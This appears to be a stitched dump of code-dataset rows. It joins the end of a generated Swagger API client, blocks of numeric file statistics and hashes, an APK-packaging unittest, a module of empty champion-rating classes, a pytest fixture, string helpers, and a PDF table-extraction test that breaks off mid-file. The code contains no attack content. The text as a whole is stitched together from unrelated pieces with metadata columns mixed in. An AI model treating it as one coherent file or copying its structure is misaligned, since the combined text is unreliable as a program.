header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['kapi auth'] # noqa: E501
return self.api_client.call_api(
'/v1/rootsubject', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SubjectResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_work_root(self, **kwargs): # noqa: E501
"""get root work # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_work_root(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WorkResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_work_root_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_work_root_with_http_info(**kwargs) # noqa: E501
return data
def get_work_root_with_http_info(self, **kwargs): # noqa: E501
"""get root work # noqa: E501
get the root node for person # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_work_root_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WorkResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_work_root" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['kapi auth'] # noqa: E501
return self.api_client.call_api(
'/v1/rootwork', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def healthcheck(self, **kwargs): # noqa: E501
"""healthcheck # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.healthcheck(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: BuildProperties
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.healthcheck_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.healthcheck_with_http_info(**kwargs) # noqa: E501
return data
def healthcheck_with_http_info(self, **kwargs): # noqa: E501
"""healthcheck # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.healthcheck_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: BuildProperties
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method healthcheck" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1/health', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='BuildProperties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 34.128947
| 119
| 0.594957
| 1,462
| 12,969
| 5.008208
| 0.100547
| 0.051352
| 0.030593
| 0.039334
| 0.916826
| 0.916826
| 0.908905
| 0.890057
| 0.887053
| 0.87162
| 0
| 0.017148
| 0.316524
| 12,969
| 379
| 120
| 34.218997
| 0.80889
| 0.321536
| 0
| 0.781726
| 1
| 0
| 0.143301
| 0.03284
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045685
| false
| 0
| 0.020305
| 0
| 0.13198
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2b33acdf0c9289821aa1ef013b366f000a129d9
| 2,330
|
py
|
Python
|
wrt/wrt-packertool2-android-tests/packertool2/indextest.py
|
yugang/crosswalk-test-suite
|
c02e50b7901f0ccd7b42028460c907465f0cb682
|
[
"BSD-3-Clause"
] | null | null | null |
wrt/wrt-packertool2-android-tests/packertool2/indextest.py
|
yugang/crosswalk-test-suite
|
c02e50b7901f0ccd7b42028460c907465f0cb682
|
[
"BSD-3-Clause"
] | null | null | null |
wrt/wrt-packertool2-android-tests/packertool2/indextest.py
|
yugang/crosswalk-test-suite
|
c02e50b7901f0ccd7b42028460c907465f0cb682
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import unittest
import os, sys, commands
import comm
class TestPackertoolsFunctions(unittest.TestCase):
def test_index1(self):
comm.setUp()
cmd = "python %smake_apk.py --package=org.hello.world --name=world --arch=%s --mode=%s --app-root=%s --app-local-path=%s" % \
(comm.Pck_Tools, comm.ARCH, comm.MODE, comm.APP_PATH, comm.INDEX_PATH[0])
packstatus = commands.getstatusoutput(cmd)
if packstatus[0] == 0:
print "Generate APK ----------------> OK!"
result = commands.getstatusoutput("ls")
self.assertIn(comm.AppName, result[1])
else:
print "Generate APK ----------------> Error!"
result = commands.getstatusoutput("ls")
self.assertNotIn(comm.AppName, result[1])
os.remove(comm.AppName)
def test_index2(self):
comm.setUp()
cmd = "python %smake_apk.py --package=org.hello.world --name=world --arch=%s --mode=%s --app-root=%s --app-local-path=%s" % \
(comm.Pck_Tools, comm.ARCH, comm.MODE, comm.APP_PATH, comm.INDEX_PATH[1])
packstatus = commands.getstatusoutput(cmd)
if packstatus[0] == 0:
print "Generate APK ----------------> OK!"
result = commands.getstatusoutput("ls")
self.assertIn(comm.AppName, result[1])
else:
print "Generate APK ----------------> Error!"
result = commands.getstatusoutput("ls")
self.assertNotIn(comm.AppName, result[1])
os.remove(comm.AppName)
def test_index3(self):
comm.setUp()
cmd = "python %smake_apk.py --package=org.hello.world --name=world --arch=%s --mode=%s --app-root=%s --app-local-path=%s" % \
(comm.Pck_Tools, comm.ARCH, comm.MODE, comm.APP_PATH, comm.INDEX_PATH[2])
packstatus = commands.getstatusoutput(cmd)
if packstatus[0] == 0:
print "Generate APK ----------------> OK!"
result = commands.getstatusoutput("ls")
self.assertIn(comm.AppName, result[1])
else:
print "Generate APK ----------------> Error!"
result = commands.getstatusoutput("ls")
self.assertNotIn(comm.AppName, result[1])
os.remove(comm.AppName)
if __name__ == '__main__':
unittest.main()
| 41.607143
| 133
| 0.572103
| 270
| 2,330
| 4.851852
| 0.211111
| 0.158015
| 0.073282
| 0.141985
| 0.883206
| 0.883206
| 0.883206
| 0.883206
| 0.883206
| 0.883206
| 0
| 0.01028
| 0.248498
| 2,330
| 55
| 134
| 42.363636
| 0.737864
| 0.008584
| 0
| 0.75
| 0
| 0.0625
| 0.247726
| 0.032482
| 0
| 0
| 0
| 0
| 0.125
| 0
| null | null | 0
| 0.0625
| null | null | 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d2e76aa33c87c047d0f7d56a1cf210ef02df1f72
| 6,821
|
py
|
Python
|
loldib/getratings/models/NA/na_vladimir/na_vladimir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_vladimir/na_vladimir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_vladimir/na_vladimir_sup.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_Vladimir_Sup_Aatrox(Ratings):
pass
class NA_Vladimir_Sup_Ahri(Ratings):
pass
class NA_Vladimir_Sup_Akali(Ratings):
pass
class NA_Vladimir_Sup_Alistar(Ratings):
pass
class NA_Vladimir_Sup_Amumu(Ratings):
pass
class NA_Vladimir_Sup_Anivia(Ratings):
pass
class NA_Vladimir_Sup_Annie(Ratings):
pass
class NA_Vladimir_Sup_Ashe(Ratings):
pass
class NA_Vladimir_Sup_AurelionSol(Ratings):
pass
class NA_Vladimir_Sup_Azir(Ratings):
pass
class NA_Vladimir_Sup_Bard(Ratings):
pass
class NA_Vladimir_Sup_Blitzcrank(Ratings):
pass
class NA_Vladimir_Sup_Brand(Ratings):
pass
class NA_Vladimir_Sup_Braum(Ratings):
pass
class NA_Vladimir_Sup_Caitlyn(Ratings):
pass
class NA_Vladimir_Sup_Camille(Ratings):
pass
class NA_Vladimir_Sup_Cassiopeia(Ratings):
pass
class NA_Vladimir_Sup_Chogath(Ratings):
pass
class NA_Vladimir_Sup_Corki(Ratings):
pass
class NA_Vladimir_Sup_Darius(Ratings):
pass
class NA_Vladimir_Sup_Diana(Ratings):
pass
class NA_Vladimir_Sup_Draven(Ratings):
pass
class NA_Vladimir_Sup_DrMundo(Ratings):
pass
class NA_Vladimir_Sup_Ekko(Ratings):
pass
class NA_Vladimir_Sup_Elise(Ratings):
pass
class NA_Vladimir_Sup_Evelynn(Ratings):
pass
class NA_Vladimir_Sup_Ezreal(Ratings):
pass
class NA_Vladimir_Sup_Fiddlesticks(Ratings):
pass
class NA_Vladimir_Sup_Fiora(Ratings):
pass
class NA_Vladimir_Sup_Fizz(Ratings):
pass
class NA_Vladimir_Sup_Galio(Ratings):
pass
class NA_Vladimir_Sup_Gangplank(Ratings):
pass
class NA_Vladimir_Sup_Garen(Ratings):
pass
class NA_Vladimir_Sup_Gnar(Ratings):
pass
class NA_Vladimir_Sup_Gragas(Ratings):
pass
class NA_Vladimir_Sup_Graves(Ratings):
pass
class NA_Vladimir_Sup_Hecarim(Ratings):
pass
class NA_Vladimir_Sup_Heimerdinger(Ratings):
pass
class NA_Vladimir_Sup_Illaoi(Ratings):
pass
class NA_Vladimir_Sup_Irelia(Ratings):
pass
class NA_Vladimir_Sup_Ivern(Ratings):
pass
class NA_Vladimir_Sup_Janna(Ratings):
pass
class NA_Vladimir_Sup_JarvanIV(Ratings):
pass
class NA_Vladimir_Sup_Jax(Ratings):
pass
class NA_Vladimir_Sup_Jayce(Ratings):
pass
class NA_Vladimir_Sup_Jhin(Ratings):
pass
class NA_Vladimir_Sup_Jinx(Ratings):
pass
class NA_Vladimir_Sup_Kalista(Ratings):
pass
class NA_Vladimir_Sup_Karma(Ratings):
pass
class NA_Vladimir_Sup_Karthus(Ratings):
pass
class NA_Vladimir_Sup_Kassadin(Ratings):
pass
class NA_Vladimir_Sup_Katarina(Ratings):
pass
class NA_Vladimir_Sup_Kayle(Ratings):
pass
class NA_Vladimir_Sup_Kayn(Ratings):
pass
class NA_Vladimir_Sup_Kennen(Ratings):
pass
class NA_Vladimir_Sup_Khazix(Ratings):
pass
class NA_Vladimir_Sup_Kindred(Ratings):
pass
class NA_Vladimir_Sup_Kled(Ratings):
pass
class NA_Vladimir_Sup_KogMaw(Ratings):
pass
class NA_Vladimir_Sup_Leblanc(Ratings):
pass
class NA_Vladimir_Sup_LeeSin(Ratings):
pass
class NA_Vladimir_Sup_Leona(Ratings):
pass
class NA_Vladimir_Sup_Lissandra(Ratings):
pass
class NA_Vladimir_Sup_Lucian(Ratings):
pass
class NA_Vladimir_Sup_Lulu(Ratings):
pass
class NA_Vladimir_Sup_Lux(Ratings):
pass
class NA_Vladimir_Sup_Malphite(Ratings):
pass
class NA_Vladimir_Sup_Malzahar(Ratings):
pass
class NA_Vladimir_Sup_Maokai(Ratings):
pass
class NA_Vladimir_Sup_MasterYi(Ratings):
pass
class NA_Vladimir_Sup_MissFortune(Ratings):
pass
class NA_Vladimir_Sup_MonkeyKing(Ratings):
pass
class NA_Vladimir_Sup_Mordekaiser(Ratings):
pass
class NA_Vladimir_Sup_Morgana(Ratings):
pass
class NA_Vladimir_Sup_Nami(Ratings):
pass
class NA_Vladimir_Sup_Nasus(Ratings):
pass
class NA_Vladimir_Sup_Nautilus(Ratings):
pass
class NA_Vladimir_Sup_Nidalee(Ratings):
pass
class NA_Vladimir_Sup_Nocturne(Ratings):
pass
class NA_Vladimir_Sup_Nunu(Ratings):
pass
class NA_Vladimir_Sup_Olaf(Ratings):
pass
class NA_Vladimir_Sup_Orianna(Ratings):
pass
class NA_Vladimir_Sup_Ornn(Ratings):
pass
class NA_Vladimir_Sup_Pantheon(Ratings):
pass
class NA_Vladimir_Sup_Poppy(Ratings):
pass
class NA_Vladimir_Sup_Quinn(Ratings):
pass
class NA_Vladimir_Sup_Rakan(Ratings):
pass
class NA_Vladimir_Sup_Rammus(Ratings):
pass
class NA_Vladimir_Sup_RekSai(Ratings):
pass
class NA_Vladimir_Sup_Renekton(Ratings):
pass
class NA_Vladimir_Sup_Rengar(Ratings):
pass
class NA_Vladimir_Sup_Riven(Ratings):
pass
class NA_Vladimir_Sup_Rumble(Ratings):
pass
class NA_Vladimir_Sup_Ryze(Ratings):
pass
class NA_Vladimir_Sup_Sejuani(Ratings):
pass
class NA_Vladimir_Sup_Shaco(Ratings):
pass
class NA_Vladimir_Sup_Shen(Ratings):
pass
class NA_Vladimir_Sup_Shyvana(Ratings):
pass
class NA_Vladimir_Sup_Singed(Ratings):
pass
class NA_Vladimir_Sup_Sion(Ratings):
pass
class NA_Vladimir_Sup_Sivir(Ratings):
pass
class NA_Vladimir_Sup_Skarner(Ratings):
pass
class NA_Vladimir_Sup_Sona(Ratings):
pass
class NA_Vladimir_Sup_Soraka(Ratings):
pass
class NA_Vladimir_Sup_Swain(Ratings):
pass
class NA_Vladimir_Sup_Syndra(Ratings):
pass
class NA_Vladimir_Sup_TahmKench(Ratings):
pass
class NA_Vladimir_Sup_Taliyah(Ratings):
pass
class NA_Vladimir_Sup_Talon(Ratings):
pass
class NA_Vladimir_Sup_Taric(Ratings):
pass
class NA_Vladimir_Sup_Teemo(Ratings):
pass
class NA_Vladimir_Sup_Thresh(Ratings):
pass
class NA_Vladimir_Sup_Tristana(Ratings):
pass
class NA_Vladimir_Sup_Trundle(Ratings):
pass
class NA_Vladimir_Sup_Tryndamere(Ratings):
pass
class NA_Vladimir_Sup_TwistedFate(Ratings):
pass
class NA_Vladimir_Sup_Twitch(Ratings):
pass
class NA_Vladimir_Sup_Udyr(Ratings):
pass
class NA_Vladimir_Sup_Urgot(Ratings):
pass
class NA_Vladimir_Sup_Varus(Ratings):
pass
class NA_Vladimir_Sup_Vayne(Ratings):
pass
class NA_Vladimir_Sup_Veigar(Ratings):
pass
class NA_Vladimir_Sup_Velkoz(Ratings):
pass
class NA_Vladimir_Sup_Vi(Ratings):
pass
class NA_Vladimir_Sup_Viktor(Ratings):
pass
class NA_Vladimir_Sup_Vladimir(Ratings):
pass
class NA_Vladimir_Sup_Volibear(Ratings):
pass
class NA_Vladimir_Sup_Warwick(Ratings):
pass
class NA_Vladimir_Sup_Xayah(Ratings):
pass
class NA_Vladimir_Sup_Xerath(Ratings):
pass
class NA_Vladimir_Sup_XinZhao(Ratings):
pass
class NA_Vladimir_Sup_Yasuo(Ratings):
pass
class NA_Vladimir_Sup_Yorick(Ratings):
pass
class NA_Vladimir_Sup_Zac(Ratings):
pass
class NA_Vladimir_Sup_Zed(Ratings):
pass
class NA_Vladimir_Sup_Ziggs(Ratings):
pass
class NA_Vladimir_Sup_Zilean(Ratings):
pass
class NA_Vladimir_Sup_Zyra(Ratings):
pass
| 16.357314
| 46
| 0.776133
| 972
| 6,821
| 5.020576
| 0.151235
| 0.197951
| 0.42418
| 0.509016
| 0.814139
| 0.814139
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162879
| 6,821
| 416
| 47
| 16.396635
| 0.854641
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
d2ec0c4bd971c02f74d2e76a1235a7c94d05cafd
| 151
|
py
|
Python
|
tests/conftest.py
|
kiryteo/pytorch-bioimage-io
|
53373c45d3833b35657914953aaac544ec794a7e
|
[
"MIT"
] | 1
|
2021-08-04T04:03:37.000Z
|
2021-08-04T04:03:37.000Z
|
tests/test_bioimage-io/conftest.py
|
LalithShiyam/pytorch-3dunet
|
f6b6c13cb0bb6194e95976b0245b76aaa9e9a496
|
[
"MIT"
] | null | null | null |
tests/test_bioimage-io/conftest.py
|
LalithShiyam/pytorch-3dunet
|
f6b6c13cb0bb6194e95976b0245b76aaa9e9a496
|
[
"MIT"
] | 1
|
2022-03-14T04:43:24.000Z
|
2022-03-14T04:43:24.000Z
|
import os
from pathlib import Path
import pytest
@pytest.fixture
def cache_path(tmp_path):
return Path(os.getenv("PYBIO_CACHE_PATH", tmp_path))
| 15.1
| 56
| 0.774834
| 24
| 151
| 4.666667
| 0.541667
| 0.160714
| 0.214286
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139073
| 151
| 9
| 57
| 16.777778
| 0.861538
| 0
| 0
| 0
| 0
| 0
| 0.10596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
960e10bfd5f5eb8370b3c05a92ff07f0e2cc6e5c
| 198
|
py
|
Python
|
prototyping/utils.py
|
QuVil/mon-bot-le-dj
|
e9320fc19b1665dbb023c5eac015a208ba612750
|
[
"MIT"
] | 5
|
2020-06-25T17:12:53.000Z
|
2020-07-22T16:03:19.000Z
|
prototyping/utils.py
|
QuVil/mon-bot-le-dj
|
e9320fc19b1665dbb023c5eac015a208ba612750
|
[
"MIT"
] | 3
|
2020-06-29T22:24:32.000Z
|
2020-08-30T10:45:44.000Z
|
prototyping/utils.py
|
QuVil/mon-bot-le-dj
|
e9320fc19b1665dbb023c5eac015a208ba612750
|
[
"MIT"
] | null | null | null |
def string_or_none(string: str) -> object:
return string if string else None
def as_real_or_none(string: str) -> object:
try: return float(string.replace(',', '.'))
except: return None
| 28.285714
| 47
| 0.686869
| 29
| 198
| 4.517241
| 0.517241
| 0.091603
| 0.183206
| 0.229008
| 0.320611
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 198
| 7
| 48
| 28.285714
| 0.808642
| 0
| 0
| 0
| 0
| 0
| 0.010101
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
82491719a960fe81cca2c6d25756756dc4f27aa7
| 23,875
|
py
|
Python
|
tests/test_tables.py
|
SimonHurst/py-pdf-parser
|
4186115b64115e9916475d4a034542a64f57457b
|
[
"MIT"
] | null | null | null |
tests/test_tables.py
|
SimonHurst/py-pdf-parser
|
4186115b64115e9916475d4a034542a64f57457b
|
[
"MIT"
] | null | null | null |
tests/test_tables.py
|
SimonHurst/py-pdf-parser
|
4186115b64115e9916475d4a034542a64f57457b
|
[
"MIT"
] | null | null | null |
from py_pdf_parser.common import BoundingBox
from py_pdf_parser.exceptions import (
InvalidTableError,
InvalidTableHeaderError,
TableExtractionError,
)
from py_pdf_parser.tables import (
extract_simple_table,
extract_table,
get_text_from_table,
_validate_table_shape,
add_header_to_table,
)
from .base import BaseTestCase
from .utils import create_pdf_document, create_pdf_element, FakePDFMinerTextElement
class TestTables(BaseTestCase):
def test_extract_simple_table(self):
# Checks that simple 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
result = extract_simple_table(elem_list)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2], [elem_3, elem_4]], result
)
# Checks that it raises an exception when table is not rectangular i.e table
# has empty cells
#
# elem_1 elem_2
# elem_3 elem_4 elem_5
#
elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 0, 5))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
)
elem_list = document.elements
with self.assertRaises(TableExtractionError):
extract_simple_table(elem_list)
def test_extract_simple_table_with_gaps(self):
# elem_1 elem_2 elem_3
# elem_4 elem_5
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 6, 10))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
)
elem_list = document.elements
result = extract_simple_table(elem_list, allow_gaps=True)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 3)
self.assertEqual(len(result[1]), 3)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2, elem_3], [elem_4, elem_5, None]], result
)
def test_extract_simple_table_with_gaps_and_different_reference(self):
# elem_1 elem_2 elem_3
# elem_4 elem_5
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 6, 10))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
)
elem_list = document.elements
reference_element = self.extract_element_from_list(elem_2, elem_list)
result = extract_simple_table(
elem_list, allow_gaps=True, reference_element=reference_element
)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 3)
self.assertEqual(len(result[1]), 3)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2, elem_3], [elem_4, elem_5, None]], result
)
def test_extract_simple_table_with_gaps_and_wrong_reference(self):
# elem_1 elem_2 elem_3
# elem_4 elem_5
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 6, 10))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5]
)
elem_list = document.elements
reference_element = self.extract_element_from_list(elem_3, elem_list)
with self.assertRaises(TableExtractionError):
extract_simple_table(
elem_list, allow_gaps=True, reference_element=reference_element
)
def test_extract_simple_table_from_different_pages(self):
# Checks that simple 2*2 tables are correctly extracted from different pages
#
# Page 1:
# elem_p1_1 elem_p1_2
# elem_p1_3 elem_p1_4
#
# Page 2:
# elem_p2_1 elem_p2_2
# elem_p2_3 elem_p2_4
#
elem_p1_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_p1_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_p1_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_p1_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
elem_p2_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_p2_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_p2_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_p2_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(
elements={
1: [elem_p1_1, elem_p1_2, elem_p1_3, elem_p1_4],
2: [elem_p2_1, elem_p2_2, elem_p2_3, elem_p2_4],
}
)
elem_list = document.elements
result = extract_simple_table(elem_list)
self.assertEqual(len(result), 4)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertEqual(len(result[2]), 2)
self.assertEqual(len(result[3]), 2)
self.assert_original_element_list_list_equal(
[
[elem_p1_1, elem_p1_2],
[elem_p1_3, elem_p1_4],
[elem_p2_1, elem_p2_2],
[elem_p2_3, elem_p2_4],
],
result,
)
def test_extract_simple_table_with_tolerance(self):
# Checks that simple 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
# But with elem_4 slightly overlapping elem_2, counteracted by setting tolerance
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 6.1))
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
with self.assertRaises(TableExtractionError):
extract_simple_table(elem_list)
result = extract_simple_table(elem_list, tolerance=0.2)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2], [elem_3, elem_4]], result
)
def test_extract_table(self):
# Checks that simple 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
result = extract_table(elem_list)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2], [elem_3, elem_4]], result
)
# Checks that the following table is correctly extracted
#
# elem_1 elem_2 elem_6
# elem_3 elem_4 elem_5
#
elem_5 = FakePDFMinerTextElement(bounding_box=BoundingBox(11, 15, 0, 5))
elem_6 = FakePDFMinerTextElement(bounding_box=BoundingBox(16, 20, 6, 10))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
result = extract_table(elem_list)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 4)
self.assertEqual(len(result[1]), 4)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2, None, elem_6], [elem_3, elem_4, elem_5, None]], result
)
# Checks that it raises an error if one element is in two rows
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(3, 8, 6, 10))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list)
